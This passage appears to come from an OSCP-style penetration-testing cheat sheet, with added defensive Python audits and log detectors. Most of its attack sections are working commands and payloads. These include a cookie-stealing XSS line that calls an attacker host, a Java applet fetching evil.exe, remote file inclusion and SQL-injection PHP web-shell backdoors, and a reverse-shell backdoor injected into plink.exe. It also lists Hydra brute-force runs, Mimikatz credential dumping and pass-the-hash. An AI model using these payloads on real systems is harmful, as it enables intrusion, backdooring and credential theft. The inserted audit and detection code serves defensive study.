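An added audit check for the GPP misconfiguration above (example code, not the guide's): the finding is any non-empty `cpassword` attribute in a preference XML under SYSVOL, since the AES key that protects it is public, which is why gpp-decrypt works at all. The Groups.xml content, the policy directory name and the cpassword value are constructed placeholders; the `runAs` and `accountName` attributes for the other preference types are assumed.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed Groups.xml with a placeholder cpassword (not a real encrypted value).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2017-09-25 13:10:55">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-CPASSWORD" neverExpires="1"/>
  </User>
  <User name="Helpdesk" changed="2017-09-25 13:11:00">
    <Properties action="U" userName="Helpdesk" cpassword="" changeLogon="1"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text):
    """Return one finding per element whose cpassword attribute is non-empty."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpassword = elem.get("cpassword")
        if not cpassword:          # cpassword="" stores no credential
            continue
        # userName is the Groups.xml attribute; runAs / accountName are assumed
        # to be the equivalents in the other preference types.
        account = elem.get("userName") or elem.get("runAs") or elem.get("accountName")
        findings.append({"element": elem.tag, "account": account,
                         "cpassword_length": len(cpassword)})
    return findings


def audit_sysvol(root_dir):
    """Walk a mounted SYSVOL copy and report every GPP file holding a cpassword."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8-sig") as fh:   # tolerate a BOM
                try:
                    hits = find_cpasswords(fh.read())
                except ET.ParseError:
                    continue
            if hits:
                report[path] = hits
    return report


def demo_audit():
    """Write the constructed sample into a temporary SYSVOL-like tree and audit it."""
    base = tempfile.mkdtemp()
    gpp_dir = os.path.join(base, "Policies", "{POLICY-GUID-PLACEHOLDER}",
                           "Machine", "Preferences", "Groups")
    os.makedirs(gpp_dir)
    with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return audit_sysvol(base)


if __name__ == "__main__":
    for path, hits in demo_audit().items():
        for hit in hits:
            print(f"{path}: {hit['element']} for {hit['account']} stores a cpassword")
```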
- Find and display the proof.txt or flag.txt - get the loot!

    `#meterpreter > run post/windows/gather/win_privs`
    `cd\ & dir /b /s proof.txt`
    `type c:\pathto\proof.txt`


1606. Client, Web and Password Attacks


1607. ==============================================================================================================================

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1608.
1609. - <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks

1610. ------------------------------------------------------------------------------------------------------------

1611.
1612. - MS12-037- Internet Explorer 8 Fixed Col Span ID

1613. wget -O exploit.html


1614. <http://www.exploit-db.com/download/24017>

1615. service apache2 start


1616.

1617. - JAVA Signed Jar client side attack

1618. echo '<applet width="1" height="1" id="Java Secure"


1619. code="Java.class" archive="SignedJava.jar"><param name="1"

1620. value="http://$ip:80/evil.exe"></applet>' >


1621. /var/www/html/java.html

1622. User must hit run on the popup that occurs.

1623.
1624. - Linux Client Shells

1625. [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-
shells-using-built-in-tools/)

1626.

1627. - Setting up the Client Side Exploit


1628.

1629. - Swapping Out the Shellcode


1630.

1631. - Injecting a Backdoor Shell into Plink.exe


1632. backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip

1633. -P 4444 -s reverse\_shell\_tcp

1634.

- <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks
---------------------------------------------------------------------------------------------------------

- Web Shag Web Application Vulnerability Assessment Platform

    `webshag-gui`

- Web Shells

    http://tools.kali.org/maintaining-access/webshells

    `ls -l /usr/share/webshells/`

- Generate a PHP backdoor (generate) protected with the given password (s3cr3t)

    `weevely generate s3cr3t weevely.php`

    `weevely http://$ip/weevely.php s3cr3t`

- Java Signed Applet Attack

- HTTP / HTTPS Webserver Enumeration

- OWASP Dirbuster

- `nikto -h $ip`

- Essential Iceweasel Add-ons

    Cookies Manager: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

    Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

- Cross Site Scripting (XSS)

    XSS can have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim's browser to a malicious HTML page, and more.

- Browser Redirection and IFRAME Injection

    `<iframe SRC="http://$ip/report" height="0" width="0"></iframe>`

- Stealing Cookies and Session Information

    `<script>new Image().src="http://$ip/bogus.php?output="+document.cookie;</script>`

    `nc -nlvp 80`
- File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------------------------------------------

- Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.

- fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):

    https://github.com/kurobeats/fimap

- Gaining a shell from phpinfo()

    fimap + phpinfo() Exploit - If a phpinfo() file is present, it's usually possible to get a shell. If you don't know the location of the phpinfo file, fimap can probe for it, or you could use a tool like OWASP DirBuster.

- For Local File Inclusions look for the include() function in PHP code.

    `include("lang/".$_COOKIE['lang']);`

    `include($_GET['page'].".php");`

- LFI - Encode and Decode a file using base64

    `curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=index | grep -e '[^\ ]\{40,\}' | base64 -d`

- LFI - Download file with base64 encoding

    `http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php`

- LFI Linux Files:

    ```
    /etc/issue
    /proc/version
    /etc/profile
    /etc/passwd
    /etc/shadow
    /root/.bash_history
    /var/log/dmesg
    /var/mail/root
    /var/spool/cron/crontabs/root
    ```

- LFI Windows Files:

    ```
    %SYSTEMROOT%\repair\system
    %SYSTEMROOT%\repair\SAM
    %WINDIR%\win.ini
    %SYSTEMDRIVE%\boot.ini
    %WINDIR%\Panther\sysprep.inf
    %WINDIR%\system32\config\AppEvent.Evt
    ```

- LFI OSX Files:

    ```
    /etc/fstab
    /etc/master.passwd
    /etc/resolv.conf
    /etc/sudoers
    /etc/sysctl.conf
    ```

- LFI - Download passwords file

    `http://$ip/index.php?page=/etc/passwd`

    `http://$ip/index.php?file=../../../../etc/passwd`

- LFI - Download passwords file with filter evasion

    `http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd`

- Local File Inclusion - In versions of PHP below 5.3 we can terminate with a null byte

    `GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00`

- Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>`

- For a Remote File Inclusion look for PHP code that is not sanitized and passed to the PHP include function; the php.ini file must also be configured to allow remote files.

    */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"

    `include($_REQUEST["file"].".php");`

- Remote File Inclusion

    `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt`

    `<?php echo shell_exec("ipconfig");?>`
- <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities
----------------------------------------------------------------------------------------------------------------------

- Grab password hashes from a web application MySQL database called "Users" - once you have the MySQL root username and password

    ```
    mysql -u root -p -h $ip
    use Users;
    show tables;
    select * from users;
    ```

- Authentication Bypass

    `name='wronguser' or 1=1;`

    `name='wronguser' or 1=1 LIMIT 1;`

- Enumerating the Database

    `http://192.168.11.35/comment.php?id=738)'`

    Verbose error message?

    `http://$ip/comment.php?id=738 order by 1`

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6`

    Determine MySQL version:

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6`

    Current user being used for the database connection:

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6`

    Enumerate database tables and column structures:

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables`

    Target the users table in the database:

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'`

    Extract the name and password:

    `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users`

    Create a backdoor:

    `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`
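The file-inclusion payloads in the previous section (`php://filter` wrappers, `../` traversal, `%00` truncation, remote `http://` includes) and the UNION-based enumeration requests above all leave distinctive traces in web server access logs. The following is an added example, not part of the original guide: detection logic a defender can run over combined-format access log lines to triage which requests, parameters and source IPs carried these payloads. The log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Nov/2017:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Nov/2017:10:01:07 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048 "-" "curl/7.52"
10.0.0.9 - - [22/Nov/2017:10:01:09 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1901 "-" "curl/7.52"
10.0.0.9 - - [22/Nov/2017:10:01:11 +0000] "GET /addguestbook.php?name=a&comment=b&LANG=http://10.0.0.9/evil.txt HTTP/1.1" 200 77 "-" "curl/7.52"
10.0.0.9 - - [22/Nov/2017:10:01:12 +0000] "GET /addguestbook.php?LANG=../../../../windows/system32/drivers/etc/hosts%00 HTTP/1.1" 500 0 "-" "curl/7.52"
10.0.0.7 - - [22/Nov/2017:10:02:30 +0000] "GET /comment.php?id=738%20union%20all%20select%201,2,3,4,@@version,6 HTTP/1.1" 200 890 "-" "sqlmap/1.1"
10.0.0.7 - - [22/Nov/2017:10:02:31 +0000] "GET /comment.php?id=738%20order%20by%201 HTTP/1.1" 200 890 "-" "sqlmap/1.1"
10.0.0.5 - - [22/Nov/2017:10:03:00 +0000] "GET /blog/index.php?search=union+station HTTP/1.1" 200 400 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the fully decoded value of every query parameter.
RULES = {
    "lfi-php-wrapper": re.compile(r'^(php|file|data|expect|phar|zip)://', re.I),
    "lfi-traversal": re.compile(r'(\.\./|\.\.\\){2,}'),
    "lfi-null-byte": re.compile(r'\x00'),
    "rfi-remote-url": re.compile(r'^(https?|ftp)://', re.I),
    "sqli-union": re.compile(r'\bunion\b\s+(all\s+)?select\b', re.I),
    "sqli-order-by": re.compile(r'\border\s+by\s+\d+', re.I),
    "sqli-info-schema": re.compile(r'information_schema\.|@@version|\buser\(\)', re.I),
}


def decode_params(target):
    """Split the request target's query into (name, value) pairs.

    Values are decoded twice so that double-encoded payloads (%252F) are caught as well,
    and '+' is treated as a space as browsers and sqlmap send it.
    """
    pairs = []
    for part in urlsplit(target).query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(unquote_plus(value))))
    return pairs


def triage(log_text):
    """Return one finding per suspicious parameter: ip, path, param, matched rule names, status."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        for name, value in decode_params(m["target"]):
            hits = [rule for rule, rx in RULES.items() if rx.search(value)]
            if hits:
                findings.append({"ip": m["ip"], "path": path, "param": name,
                                 "rules": hits, "status": int(m["status"])})
    return findings


def summarise(findings):
    """Count findings per source IP to prioritise which host to block or investigate first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['path']:<20} {f['param']:<6} {','.join(f['rules'])}")
    print(summarise(triage(SAMPLE_LOG)))
```

A benign search for "union station" on the last line is deliberately included: it does not match because the union rule requires a following SELECT.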

- **SQLMap Examples**

- Crawl the links

    `sqlmap -u http://$ip --crawl=1`

    `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`

- SQLMap search for databases against a suspected GET SQL injection

    `sqlmap -u http://$ip/blog/index.php?search --dbs`

- SQLMap dump tables from database oscommerce at a GET SQL injection

    `sqlmap -u http://$ip/blog/index.php?search= --dbs -D oscommerce --tables --dump`

- SQLMap GET parameter command

    `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump --threads=5`

- SQLMap POST username parameter

    `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`

- SQLMap OS shell

    `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --os-shell`

    `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`

- Automated sqlmap scan

    `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`

- Targeted sqlmap scan

    `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --technique=U --random-agent --dump`

- Scan URL for union + error based injection with MySQL backend and use a random user agent + database dump

    `sqlmap -o -u http://$ip/index.php --forms --dbs`

    `sqlmap -o -u "http://$ip/form/" --forms`

- Sqlmap check form for injection

    `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`

- Enumerate databases

    `sqlmap --dbms=mysql -u "$URL" --dbs`

- Enumerate tables from a specific database

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables`

- Dump table data from a specific database and table

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump`

- Specify parameter to exploit

    `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2`

- Specify parameter to exploit in 'nice' URIs (exploits param1)

    `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs`

- Get OS shell

    `sqlmap --dbms=mysql -u "$URL" --os-shell`

- Get SQL shell

    `sqlmap --dbms=mysql -u "$URL" --sql-shell`

- SQL query

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`

- Use Tor SOCKS5 proxy

    `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`

- **NoSQLMap Examples**

    You may encounter NoSQL instances like MongoDB in your OSCP journey (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQL database enumeration.

- NoSQLMap Installation

    ```
    git clone https://github.com/codingo/NoSQLMap.git
    cd NoSQLMap/
    ls
    pip install couchdb
    pip install pbkdf2
    pip install ipcalc
    python nosqlmap.py --help
    ```
- Password Attacks
--------------------------------------------------------------------------------------------------------------

- AES Decryption

    http://aesencryption.net/

- Convert multiple webpages into a word list

    `for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done`

- Or convert HTML to a word list dictionary

    `html2dic index.html.out | sort -u > index-html.dict`

- Default Usernames and Passwords

    - CIRT: http://www.cirt.net/passwords

    - Government Security - Default Logins and Passwords for Networked Devices: http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php

    - Virus.org: http://www.virus.org/default-password/

    - Default Password: http://www.defaultpassword.com/

- Brute Force

    - Nmap brute forcing scripts: https://nmap.org/nsedoc/categories/brute.html

    - Nmap generic auto-detect brute force attack

        `nmap --script brute -Pn <target.com or ip>`

    - MySQL nmap brute force attack

        `nmap --script=mysql-brute $ip`

- Dictionary Files

    - Word lists on Kali

        `cd /usr/share/wordlists`

- Key-space Brute Force

    - `crunch 6 6 0123456789ABCDEF -o crunch1.txt`

    - `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha`

    - `crunch 8 8 -t ,@@^^%%%`

- Pwdump and Fgdump - Security Accounts Manager (SAM)

    - pwdump.exe - attempts to extract password hashes

    - fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.

- Windows Credential Editor (WCE)

    - allows one to perform several attacks to obtain clear text passwords and hashes

    - `wce -w`

- Mimikatz

    - extracts plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden Tickets.

        https://github.com/gentilkiwi/mimikatz

    From a Metasploit meterpreter (must have SYSTEM level access):

    ```
    meterpreter> load mimikatz
    meterpreter> help mimikatz
    meterpreter> msv
    meterpreter> kerberos
    meterpreter> mimikatz_command -f samdump::hashes
    meterpreter> mimikatz_command -f sekurlsa::searchPasswords
    ```

- Password Profiling

    - cewl can generate a password list from a web page

        `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`

- Password Mutating

    - John the Ripper can mutate password lists

        `nano /etc/john/john.conf`

        `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`

- Medusa

    - Medusa, initiated against an htaccess protected web directory

        `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`

- Ncrack

    - ncrack (from the makers of nmap) can brute force RDP

        `ncrack -vv --user offsec -P password-file.txt rdp://$ip`

- Hydra

    - Hydra brute force against SNMP

        `hydra -P password-file.txt -v $ip snmp`

    - Hydra FTP known user and password list

        `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`

    - Hydra SSH using a list of users and passwords

        `hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh`

    - Hydra SSH using a known password and a username list

        `hydra -v -V -u -L users.txt -p "<known password>" -t 1 $ip ssh`

    - Hydra SSH against a known username on port 22

        `hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt`

    - Hydra POP3 brute force

        `hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V`

    - Hydra SMTP brute force

        `hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V`

    - Hydra attack HTTP GET 401 login with a dictionary

        `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`

    - Hydra attack Windows Remote Desktop with rockyou

        `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`

    - Hydra brute force a WordPress admin login

        `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
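Hydra runs like the SSH ones above produce bursts of failed logins from one source, often against a list of usernames that do not exist on the host. The following is an added example, not part of the original guide: detection logic over constructed sshd auth-log lines that counts failures per source IP in a sliding window and reports the sources over a threshold, distinguishing username spraying from single-account password guessing. The log lines and the year are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines in syslog format (not real traffic). syslog omits the year, so one is assumed.
# 10.0.0.9 is a fast user-list run; 10.0.0.7 is a low-and-slow run against one account (one guess every 4 minutes).
SAMPLE_AUTH_LOG = """\
Nov 22 10:00:01 web sshd[2101]: Failed password for root from 10.0.0.9 port 51001 ssh2
Nov 22 10:00:02 web sshd[2102]: Failed password for invalid user admin from 10.0.0.9 port 51002 ssh2
Nov 22 10:00:02 web sshd[2103]: Failed password for invalid user oracle from 10.0.0.9 port 51003 ssh2
Nov 22 10:00:03 web sshd[2104]: Failed password for invalid user test from 10.0.0.9 port 51004 ssh2
Nov 22 10:00:03 web sshd[2105]: Failed password for root from 10.0.0.9 port 51005 ssh2
Nov 22 10:00:04 web sshd[2106]: Failed password for offsec from 10.0.0.9 port 51006 ssh2
Nov 22 10:00:30 web sshd[2120]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Nov 22 10:00:35 web sshd[2121]: Accepted password for alice from 10.0.0.5 port 40002 ssh2
Nov 22 10:05:00 web sshd[2200]: Failed password for bob from 10.0.0.7 port 42001 ssh2
Nov 22 10:09:00 web sshd[2201]: Failed password for bob from 10.0.0.7 port 42002 ssh2
Nov 22 10:13:00 web sshd[2202]: Failed password for bob from 10.0.0.7 port 42003 ssh2
Nov 22 10:17:00 web sshd[2203]: Failed password for bob from 10.0.0.7 port 42004 ssh2
Nov 22 10:21:00 web sshd[2204]: Failed password for bob from 10.0.0.7 port 42005 ssh2
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?P<invalid>invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+'
)


def parse(log_text, year=2017):
    """Turn sshd password-auth lines into event dicts; other log lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({
            "ts": ts, "ip": m["ip"], "user": m["user"],
            "failed": m["result"] == "Failed",
            "invalid": m["invalid"] is not None,  # username does not exist: typical of a user-list run
        })
    return events


def detect(events, window_seconds=60, threshold=5):
    """Flag source IPs with at least `threshold` failed logins inside a sliding window.

    Returns {ip: {"failures", "users", "invalid_users", "kind"}} describing the window at the
    source's last failure. A short window catches a parallel Hydra run; a much longer window is
    needed for a low-and-slow run such as Hydra with -t 1, which 10.0.0.7 in the sample shows.
    """
    windows = defaultdict(deque)
    alerts = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if not e["failed"]:
            continue
        q = windows[e["ip"]]
        q.append(e)
        while (e["ts"] - q[0]["ts"]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold:
            users = sorted({x["user"] for x in q})
            alerts[e["ip"]] = {
                "failures": len(q),
                "users": users,
                "invalid_users": sum(1 for x in q if x["invalid"]),
                "kind": "username spraying" if len(users) > 1 else "password guessing",
            }
    return alerts


if __name__ == "__main__":
    events = parse(SAMPLE_AUTH_LOG)
    for label, window in (("60s window", 60), ("30min window", 1800)):
        print(label)
        for ip, a in detect(events, window_seconds=window).items():
            print(f"  {ip}: {a['failures']} failures, {a['kind']}, users={a['users']}")
```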
- <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks
-------------------------------------------------------------------------------------------------------------------

- Online Password Cracking

    https://crackstation.net/

- Hashcat

    Needed to install new drivers to get my GPU cracking to work on the Kali Linux VM, and I also had to use the --force parameter.

    `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev`

    and

    `apt-get install pocl-opencl-icd`

    Cracking Linux Hashes - /etc/shadow file

    ```
    500  | md5crypt $1$, MD5(Unix)       | Operating-Systems
    3200 | bcrypt $2*$, Blowfish(Unix)   | Operating-Systems
    7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
    1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
    ```

    Cracking Windows Hashes

    ```
    3000 | LM   | Operating-Systems
    1000 | NTLM | Operating-Systems
    ```

    Cracking Common Application Hashes

    ```
    900   | MD4      | Raw Hash
    0     | MD5      | Raw Hash
    5100  | Half MD5 | Raw Hash
    100   | SHA1     | Raw Hash
    10800 | SHA-384  | Raw Hash
    1400  | SHA-256  | Raw Hash
    1700  | SHA-512  | Raw Hash
    ```

    Create a .hash file with all the hashes you want to crack, e.g. puthasheshere.hash:

    ```
    $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
    ```

    Hashcat example cracking Linux md5crypt passwords ($1$) using rockyou:

    `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`

    WordPress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/`

    WordPress clear text: test

    Hashcat example cracking WordPress passwords using rockyou:

    `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`

- Sample Hashes

    http://openwall.info/wiki/john/sample-hashes

- Identify Hashes

    `hash-identifier`

- To crack Linux hashes you must first unshadow them:

    `unshadow passwd-file.txt shadow-file.txt`

    `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
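The hashcat table above is keyed by the `$id$` prefix of each crypt(3) hash, and `unshadow` joins `/etc/passwd` with `/etc/shadow` on the username. The following is an added example, not part of the original guide: it performs the same join in Python and reports, per account, which hash algorithm is in use, so a defender can find interactive accounts still stored with legacy descrypt or md5crypt (the fast-to-crack `-m 1500` / `-m 500` modes) that should be rehashed with sha512crypt or bcrypt. The passwd and shadow contents are constructed; only alice's hash is the md5crypt sample from above.

```python
# crypt(3) prefixes from the hashcat table above, mapped to (algorithm, hashcat mode).
# Traditional DES crypt (descrypt) has no prefix: 13 characters, hashcat mode 1500.
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
}
# Algorithms a defender should migrate away from.
LEGACY = {"descrypt", "md5crypt"}

# Constructed sample files. Only alice's hash is a real md5crypt value (the sample from above);
# the other hashes are placeholders with the right shape and are not hashes of any password.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
carol:x:1002:1002:Carol:/home/carol:/bin/sh
svc:x:999:999:service:/var/lib/svc:/usr/sbin/nologin
guest:x:1003:1003::/home/guest:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$CONSTRUCTEDplaceholderNotARealHash0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJ:17450:0:99999:7:::
alice:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/:17450:0:99999:7:::
bob:ab9CyKzNxAL4o:17450:0:99999:7:::
carol:$5$rounds=5000$saltsalt$CONSTRUCTEDplaceholderNotARealHash012345678:17450:0:99999:7:::
svc:!:17450:0:99999:7:::
guest::17450:0:99999:7:::
"""


def classify(hash_field):
    """Map one shadow password field to (algorithm, hashcat mode); mode is None when there is nothing to crack."""
    if hash_field == "":
        return ("empty-password", None)  # login possible without any password
    if hash_field.startswith(("!", "*")):
        return ("locked", None)  # account locked or password login disabled
    for prefix, result in CRYPT_PREFIXES.items():
        if hash_field.startswith(prefix):
            return result
    if len(hash_field) == 13 and "$" not in hash_field:
        return ("descrypt", 1500)  # 2-character salt + 11 characters, no prefix
    return ("unknown", None)


def parse_colon_file(text):
    """Parse passwd/shadow style lines into {username: fields}; blank lines and comments are skipped."""
    rows = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        rows[fields[0]] = fields
    return rows


def unshadow(passwd_text, shadow_text):
    """Recreate what unshadow(8) does: replace the 'x' in passwd's password field with the shadow hash."""
    shadow = parse_colon_file(shadow_text)
    joined = []
    for name, fields in parse_colon_file(passwd_text).items():
        if name in shadow:
            fields = [fields[0], shadow[name][1]] + fields[2:]
        joined.append(":".join(fields))
    return joined


def audit(passwd_text, shadow_text):
    """Per-account report; 'flag' marks interactive accounts with a legacy, empty or unrecognised hash."""
    report = []
    for line in unshadow(passwd_text, shadow_text):
        fields = line.split(":")
        user, hash_field, shell = fields[0], fields[1], fields[6]
        algorithm, mode = classify(hash_field)
        interactive = not shell.endswith(("nologin", "false"))
        flag = interactive and (algorithm in LEGACY or algorithm in ("empty-password", "unknown"))
        report.append({"user": user, "algorithm": algorithm, "hashcat_mode": mode, "flag": flag})
    return report


if __name__ == "__main__":
    for entry in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        marker = "!!" if entry["flag"] else "  "
        print(f"{marker} {entry['user']:<8} {entry['algorithm']:<15} hashcat mode={entry['hashcat_mode']}")
```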
- John the Ripper - Password Hash Cracking

    - `john $ip.pwdump`

    - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`

    - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`

    - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`

- JTR forced descrypt cracking with wordlist

    `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`

- JTR forced descrypt brute force cracking

    `john --format=descrypt hash --show`

- Passing the Hash in Windows

    - Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:

        `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896`

        `pth-winexe -U administrator //$ip cmd`
<span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling
================================================================================================================================

- Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

    - `apt-get install rinetd`

    - `cat /etc/rinetd.conf`

        ```
        # bindadress bindport connectaddress connectport
        w.x.y.z 53 a.b.c.d 80
        ```

- SSH Local Port Forwarding: supports bi-directional communication channels

    - `ssh <gateway> -L <local port to listen>:<remote host>:<remote port>`

- SSH Remote Port Forwarding: suitable for popping a remote shell on an internal non-routable network

